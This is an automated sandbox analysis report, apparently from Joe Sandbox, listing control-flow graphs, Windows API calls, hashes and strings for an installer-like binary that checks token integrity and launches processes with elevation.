                                                                                                                                                                                                                                                  control_flow_graph 0 f34ba0-f34bf1 call f357c0 3 f34bf3-f34c10 call f352f0 0->3 4 f34c15-f34c4d CoInitialize CoCreateInstance 0->4 10 f35190-f351aa call f52937 3->10 5 f34c58-f34ca6 VariantInit 4->5 6 f34c4f-f34c53 4->6 17 f34cb1-f34cd5 IUnknown_QueryService 5->17 18 f34ca8-f34cac 5->18 8 f35169-f35172 6->8 12 f35174-f35176 8->12 13 f3517a-f35185 8->13 12->13 14 f35187 CoUninitialize 13->14 15 f3518d 13->15 14->15 15->10 21 f34ce0-f34cfa 17->21 22 f34cd7-f34cdb 17->22 20 f3514b-f35154 18->20 24 f35156-f35158 20->24 25 f3515c-f35167 VariantClear 20->25 28 f34d05-f34d26 21->28 29 f34cfc-f34d00 21->29 23 f3513a-f35143 22->23 23->20 26 f35145-f35147 23->26 24->25 25->8 26->20 33 f34d31-f34d4f IUnknown_QueryInterface_Proxy 28->33 34 f34d28-f34d2c 28->34 30 f35129-f35132 29->30 30->23 31 f35134-f35136 30->31 31->23 36 f34d51-f34d55 33->36 37 f34d5a-f34d74 33->37 35 f35118-f35121 34->35 35->30 38 f35123-f35125 35->38 39 f35107-f35110 36->39 42 f34d76-f34d7a 37->42 43 f34d7f-f34d9d IUnknown_QueryInterface_Proxy 37->43 38->30 39->35 41 f35112-f35114 39->41 41->35 44 f350f6-f350ff 42->44 45 f34da8-f34dc0 CoAllowSetForegroundWindow 43->45 46 f34d9f-f34da3 43->46 44->39 50 f35101-f35103 44->50 48 f34dc2-f34dc4 45->48 49 f34e28-f34e35 SysAllocString 45->49 47 f350e5-f350ee 46->47 47->44 53 f350f0-f350f2 47->53 54 f34dca-f34ded SysAllocString 48->54 51 f34e3b 49->51 52 f351ba-f35201 call f311d0 49->52 50->39 51->54 64 f35203-f35205 52->64 65 f35209-f35217 52->65 53->44 55 f34df8-f34e1b SysAllocString 54->55 56 f34def-f34df2 54->56 59 f34e3d-f34ebf VariantInit 55->59 60 f34e1d-f34e20 55->60 56->55 58 f351b0-f351b5 call f3cf40 56->58 58->52 67 f34ec1-f34ec5 59->67 68 f34eca-f34ece 59->68 60->58 63 f34e26 60->63 63->59 64->65 69 f350a0-f350df VariantClear * 4 SysFreeString 67->69 70 f34ed4 68->70 71 f3509c 68->71 69->47 72 f34ed6-f34f0c 70->72 71->69 73 f34f10-f34f19 72->73 73->73 74 f34f1b-f34fa2 call f324c0 call f312f0 call f33860 call f32e60 * 2 73->74 85 f34fa4-f34fa8 74->85 86 f34faa 74->86 87 f34fb1-f34fb3 85->87 86->87 88 f35036-f35046 87->88 89 f34fb9-f34fc3 87->89 90 f35048-f35057 88->90 91 f3508d-f35096 88->91 92 f34fd5-f35009 OpenProcess WaitForSingleObject 89->92 93 f34fc5-f34fd3 call f34270 89->93 94 f3506a-f3506c 90->94 95 f35059-f35064 90->95 91->71 91->72 97 f35013-f35023 92->97 98 f3500b-f3500d GetExitCodeProcess 92->98 93->92 100 f35075-f35086 94->100 101 f3506e-f3506f LocalFree 94->101 95->94 99 f351ab call f57027 95->99 97->88 103 f35025-f3502c CloseHandle 97->103 98->97 99->58 100->91 101->100 103->88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F357C0: GetCurrentProcess.KERNEL32(00000008,?,80A20388,?,-00000010), ref: 00F357D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F357C0: OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00F34C15
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00F772B0,00000000,00000004,00F85104,00000000,?), ref: 00F34C45
                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 00F35187
                                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 00F351B5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 928366108-0
                                                                                                                                                                                                                                                  • Opcode ID: 6c6ba7c4846539def59969e86c8a226655708e3584824a14e5dbefd2bacb0d35
                                                                                                                                                                                                                                                  • Instruction ID: 56d6bac08680c37ad43b3588f0fb0cafa7641bb154c3e17097569288c3357e9f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c6ba7c4846539def59969e86c8a226655708e3584824a14e5dbefd2bacb0d35
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F22D170E04388DFEF11DFA8C848BADBBB4AF45314F24819DE809EB281D775AA45DB51
                                                                                                                                                                                                                                                  Function 00F36A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 105 f36a50-f36a82 106 f36aa3-f36add GetCurrentProcess OpenProcessToken 105->106 107 f36a84-f36aa2 call f52937 105->107 111 f36b09-f36b1e call f35de0 106->111 112 f36adf-f36af2 106->112 119 f36b20-f36b2c call f31770 111->119 120 f36b2e-f36b30 111->120 114 f36b02-f36b04 112->114 115 f36af4-f36afb CloseHandle 112->115 116 f36c24-f36c2b call f357c0 114->116 115->114 125 f36c31-f36c35 116->125 126 f36ddb-f36e06 call f32310 116->126 119->112 123 f36b32-f36b3d call f31770 120->123 124 f36b3f-f36ba5 call f35f40 call f324c0 120->124 123->112 141 f36ba7-f36ba9 124->141 142 f36bdb 124->142 125->126 130 f36c3b-f36c3d 125->130 138 f36f96-f36fa0 call f311d0 126->138 139 f36e0c-f36e2b call f346f0 126->139 130->126 134 f36c43-f36c59 call f32310 130->134 134->138 149 f36c5f-f36c7e call f346f0 134->149 158 f36e59-f36e6a call f32310 139->158 159 f36e2d-f36e2f 139->159 146 f36c88-f36c8a 141->146 147 f36baf-f36bb8 141->147 148 f36bdd-f36c14 call f32e60 * 2 call f31770 142->148 146->148 147->142 152 f36bba-f36bbc 147->152 148->116 184 f36c16-f36c1d CloseHandle 148->184 173 f36c80-f36c82 149->173 174 f36cad-f36cc9 call f32310 149->174 155 f36bbf 152->155 155->142 160 f36bc1-f36bc4 155->160 158->138 178 f36e70-f36e8c call f346f0 158->178 163 f36e31-f36e33 159->163 164 f36e35-f36e3a 159->164 160->146 165 f36bca-f36bd9 160->165 169 f36e4f-f36e54 call f34ac0 163->169 170 f36e40-f36e49 164->170 165->142 165->155 169->158 170->170 176 f36e4b-f36e4d 170->176 180 f36c84-f36c86 173->180 181 f36c8f-f36c91 173->181 174->138 188 f36ccf-f36ceb call f346f0 174->188 176->169 193 f36eb9-f36ec6 call f32310 178->193 194 f36e8e-f36e90 178->194 185 f36ca3-f36ca8 call f34ac0 180->185 182 f36c94-f36c9d 181->182 182->182 186 f36c9f-f36ca1 182->186 184->116 185->174 186->185 203 f36d19-f36d26 call f32310 188->203 204 f36ced-f36cef 188->204 193->138 208 f36ecc-f36ee8 call f346f0 193->208 196 f36e92-f36e94 194->196 197 f36e96-f36e9b 194->197 200 f36eaf-f36eb4 call f34ac0 196->200 201 f36ea0-f36ea9 197->201 200->193 201->201 206 f36eab-f36ead 201->206 203->138 216 f36d2c-f36d48 call f346f0 203->216 209 f36cf1-f36cf3 204->209 210 f36cf5-f36cfa 204->210 206->200 221 f36f10-f36f47 call f352f0 208->221 222 f36eea-f36eec 208->222 212 f36d0f-f36d14 call f34ac0 209->212 213 f36d00-f36d09 210->213 212->203 213->213 214 f36d0b-f36d0d 213->214 214->212 231 f36d70-f36d85 call f34ba0 216->231 232 f36d4a-f36d4c 216->232 236 f36f51-f36f65 221->236 237 f36f49-f36f4c 221->237 224 f36ef2-f36ef4 222->224 225 f36eee-f36ef0 222->225 229 f36ef7-f36f00 224->229 228 f36f06-f36f0b call f34ac0 225->228 228->221 229->229 234 f36f02-f36f04 229->234 240 f36d8a-f36da4 231->240 238 f36d52-f36d54 232->238 239 f36d4e-f36d50 232->239 234->228 242 f36f67-f36f6a 236->242 243 f36f6f-f36f76 236->243 237->236 244 f36d57-f36d60 238->244 241 f36d66-f36d6b call f34ac0 239->241 247 f36da6-f36da9 240->247 248 f36dae-f36dc2 240->248 241->231 242->243 246 f36f79-f36f84 243->246 244->244 249 f36d62-f36d64 244->249 250 f36f86-f36f89 246->250 251 f36f8e 246->251 247->248 252 f36dc4-f36dc7 248->252 253 f36dcc-f36dd6 248->253 249->241 250->251 251->138 252->253 253->246
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00F36AC8
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00F36AD5
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F36AF5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                                                                                                                  • String ID: S-1-5-18
                                                                                                                                                                                                                                                  • API String ID: 4052875653-4289277601
                                                                                                                                                                                                                                                  • Opcode ID: 85e7d0ca11b6dba37a99de6fc829f93296bc20a9477d0b4aadeb35ab76b33fba
                                                                                                                                                                                                                                                  • Instruction ID: 6b5a88930235a78f9822cf3937a1adfa5b6790a48c98dca47f0d90926c76d5fc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85e7d0ca11b6dba37a99de6fc829f93296bc20a9477d0b4aadeb35ab76b33fba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D02AE71D00249EFDF14DFA4C9557AEBBB5EF45324F148258E802EB285EB34AE05EB90
                                                                                                                                                                                                                                                  Function 00F357C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 254 f357c0-f357df GetCurrentProcess OpenProcessToken 255 f357e1-f357e6 254->255 256 f357e7-f35814 GetTokenInformation 254->256 257 f35816-f3581b 256->257 258 f3581e-f3582e CloseHandle 256->258 257->258
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?,80A20388,?,-00000010), ref: 00F357D0
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00F3580C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F35822
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 215268677-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c4822466db6804b2690ddf5c0807123b41f09ac30400ebf6adc3fac2c60234b
                                                                                                                                                                                                                                                  • Instruction ID: fd7409310ae79afb9092f6282b4e850dd5f0d2d674101d9897baf096793ae507
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c4822466db6804b2690ddf5c0807123b41f09ac30400ebf6adc3fac2c60234b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84F03674148305AFEB10AF10EC45B9A7BE8FB84710F508819FD84C2160D379955CEB63
                                                                                                                                                                                                                                                  Function 00F3CDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(80A20388,?,?,?,?,?,?,?,?,?,00F756D5,000000FF), ref: 00F3CDE8
                                                                                                                                                                                                                                                    • Part of subcall function 00F31F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00F34251,80A20388,00000000,?,00000000,?,?,?,00F74400,000000FF,?), ref: 00F31F9D
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00F3CEB1
                                                                                                                                                                                                                                                    • Part of subcall function 00F36600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                                                                                                  • String ID: Full command line:
                                                                                                                                                                                                                                                  • API String ID: 1878577176-831861440
                                                                                                                                                                                                                                                  • Opcode ID: eb3a34306c41a0d223dd9afaecf3275fa81e7de020b757bae19da0a2f9e6a115
                                                                                                                                                                                                                                                  • Instruction ID: e170ca4f6d8f45fac2b2e743ab8910a728771c85f2f8b9a49b7ce29727fe5c84
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb3a34306c41a0d223dd9afaecf3275fa81e7de020b757bae19da0a2f9e6a115
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3921F471910214ABCB15FB70CC46BEE73A5AF44760F148128F406AB292EF789B08E7D2
                                                                                                                                                                                                                                                  Function 00F35E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 291 f35e40-f35ebc GetTokenInformation 292 f35f20-f35f33 291->292 293 f35ebe-f35ec7 GetLastError 291->293 293->292 294 f35ec9-f35ed7 293->294 295 f35ed9-f35edc 294->295 296 f35ede 294->296 297 f35f0b 295->297 298 f35ee0-f35ee7 296->298 299 f35f0e-f35f1a GetTokenInformation 296->299 297->299 300 f35ef7-f35f08 call f54080 298->300 301 f35ee9-f35ef5 call f360d0 298->301 299->292 300->297 301->299
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00F35E18,80A20388,?), ref: 00F35EB4
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00F35E18,80A20388,?), ref: 00F35EBE
                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00F35E18,80A20388,?), ref: 00F35F1A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2567405617-0
                                                                                                                                                                                                                                                  • Opcode ID: 6811a739fe64946044c4788779b52c92a7ecbfc84ef17cfffb6d7066ff9c7523
                                                                                                                                                                                                                                                  • Instruction ID: 4de75c67e866f319901468170eafc380815f02ee9dce1c04e70a6bf7605b1afd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6811a739fe64946044c4788779b52c92a7ecbfc84ef17cfffb6d7066ff9c7523
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED318F71A00609AFD714CF68CC45BAFBBF9FB84B24F10452EE515E7280D7B5A9449BA0
                                                                                                                                                                                                                                                  Function 00F670BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 306 f670bb-f670c6 307 f670d4-f670da 306->307 308 f670c8-f670d2 306->308 310 f670f3-f67104 RtlAllocateHeap 307->310 311 f670dc-f670dd 307->311 308->307 309 f67108-f67113 call f57370 308->309 315 f67115-f67117 309->315 312 f67106 310->312 313 f670df-f670e6 call f65245 310->313 311->310 312->315 313->309 319 f670e8-f670f1 call f6bf83 313->319 319->309 319->310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00F6596A,00000001,00000364,?,00000006,000000FF,?,00F56CE7,00000000,00F63841,00000000), ref: 00F670FC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 545ad4447d07da4bbc85ac954dc0bf3ada9b4863616a04636f8eff15923ba1dc
                                                                                                                                                                                                                                                  • Instruction ID: c95b09cc418eefffbe29a1368ea066740d00912f6cdb2b95088c0168ad78b5d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 545ad4447d07da4bbc85ac954dc0bf3ada9b4863616a04636f8eff15923ba1dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F0BE32A0C3247B9B227A229C01B6A775DAF527B5B144126BD18AB190CF24EC00B6F2

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00F352F0 Relevance: 52.9, APIs: 14, Strings: 16, Instructions: 402libraryloadersleepCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 477 f352f0-f353a8 call f363a0 call f35d30 * 2 call f359c0 486 f357b0-f357ba call f311d0 477->486 487 f353ae-f353bd 477->487 488 f353c9-f353db call f57852 487->488 489 f353bf-f353c7 call f349a0 487->489 488->486 496 f353e1-f3540a call f35d30 488->496 489->488 499 f35414-f35419 496->499 500 f3540c-f3540f 496->500 501 f354cf-f3551b 499->501 502 f3541f-f35429 499->502 500->499 504 f35529-f3552b 501->504 505 f3551d-f35526 GetForegroundWindow 501->505 503 f35430-f35436 502->503 506 f35456-f35458 503->506 507 f35438-f3543b 503->507 508 f35531-f35535 504->508 509 f355f7-f35607 ShellExecuteExW 504->509 505->504 512 f3545b-f3545d 506->512 510 f35452-f35454 507->510 511 f3543d-f35445 507->511 513 f35540-f3554c 508->513 514 f35537-f3553e 508->514 515 f35614-f35616 509->515 516 f35609-f35612 call f35890 509->516 510->512 511->506 519 f35447-f35450 511->519 520 f35493-f354cc GetWindowsDirectoryW call f35b10 * 2 512->520 521 f3545f 512->521 522 f35550-f3555d 513->522 514->513 514->514 517 f35646-f35666 call f35b30 515->517 518 f35618-f3561e 515->518 516->515 541 f356fd-f35702 517->541 542 f3566c-f35696 GetModuleHandleW GetProcAddress AllowSetForegroundWindow 517->542 524 f35620-f35623 518->524 525 f35625-f3563b ShellExecuteExW 518->525 519->503 519->510 520->501 528 f35464-f3546a 521->528 522->522 529 f3555f-f3556b 522->529 524->517 524->525 525->517 531 f3563d-f35641 call f35890 525->531 534 f3548a-f3548c 528->534 535 f3546c-f3546f 528->535 536 f35570-f3557d 529->536 531->517 538 f3548f-f35491 534->538 543 f35471-f35479 535->543 544 f35486-f35488 535->544 536->536 537 f3557f-f355f5 call f364a0 * 5 536->537 537->509 538->501 538->520 547 f35721-f35744 call f35940 541->547 548 f35704-f3570c 541->548 542->541 556 f35698-f3569f 542->556 543->534 549 f3547b-f35484 543->549 544->538 558 f35746-f35749 547->558 559 f3574e-f35762 547->559 548->547 551 f3570e-f3571b WaitForSingleObject GetExitCodeProcess 548->551 549->528 549->544 551->547 556->541 560 f356a1-f356b2 GetModuleHandleW GetProcAddress 556->560 558->559 564 f35764-f35767 559->564 565 f3576c-f35781 559->565 562 f356b4-f356c1 560->562 563 f356fa 560->563 572 f356c3-f356c6 562->572 563->541 564->565 566 f35783-f35786 565->566 567 f3578b-f357af call f52937 565->567 566->567 575 f356c8-f356eb Sleep EnumWindows 572->575 576 f356ef-f356f1 572->576 575->572 578 f356ed 575->578 576->563 579 f356f3-f356f4 BringWindowToTop 576->579 578->579 579->563
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00F3549C
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00F3551D
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F35601
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F35637
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F3567C
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F35685
                                                                                                                                                                                                                                                  • AllowSetForegroundWindow.USER32(00000000), ref: 00F3568B
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F356AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F356AE
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00F356CA
                                                                                                                                                                                                                                                  • EnumWindows.USER32(00F35830,?), ref: 00F356DF
                                                                                                                                                                                                                                                  • BringWindowToTop.USER32(00000000), ref: 00F356F4
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00F35711
                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00F3571B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                                                                                                                                                                                  • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                                                                                                  • API String ID: 697762045-2796270252
                                                                                                                                                                                                                                                  • Opcode ID: 7de50ba8618686ecb7478f0722374a412918afdaeb6f5d1a17de9784da484436
                                                                                                                                                                                                                                                  • Instruction ID: 134e8194bf6eb0830a57a0c6096559fc7859f377738eb5afaaac82be27b5d48d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7de50ba8618686ecb7478f0722374a412918afdaeb6f5d1a17de9784da484436
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE1D171E00A099BCF14EFA8CC85BAEB7B5AF84B30F544129E815EB291E7349D41EB51
                                                                                                                                                                                                                                                  Function 00F3C870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
